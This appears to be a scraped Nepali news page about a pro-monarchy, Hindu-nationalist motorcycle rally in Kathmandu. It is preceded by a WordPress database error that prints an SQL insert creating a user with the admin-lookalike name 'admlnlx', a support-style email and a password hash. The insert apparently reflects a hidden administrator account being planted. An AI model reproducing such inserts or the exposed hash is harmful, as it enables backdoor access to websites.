WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BVglm5RRN1mqnU54Pho8KzQGRXZgCR1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 21:09:11', '', 'admlnlx', 'admlnlx')
राजतन्त्रको पक्षधर र विभिन्न हिन्दुवादी संस्थामा आबद्ध व्यक्तिहरुले शुक्रवार काठमाडौंमा मोटर साइकल र्याली लिकालेका हुन् । राष्ट्रिय झण्डा बोकेर सडकमा आएका उनीहरुले ‘राजा आउ, देश बचाउ…’, ‘हिन्दु राष्ट्र जिन्दावाद’ जस्ता नारा लगाएका थिए । रत्नपार्कबाट निकालिएको र्यालीमा दुइसय भन्दा बढी युवा सहभागि थिए ।
यसअघि पूर्वराजा शाहले बुधवार एक विज्ञप्ती प्रकाशित गरि मुलुकको पछिल्लो राजनीतिक घटनाक्रमप्रति चिन्ता व्यक्त गरेका थिए ।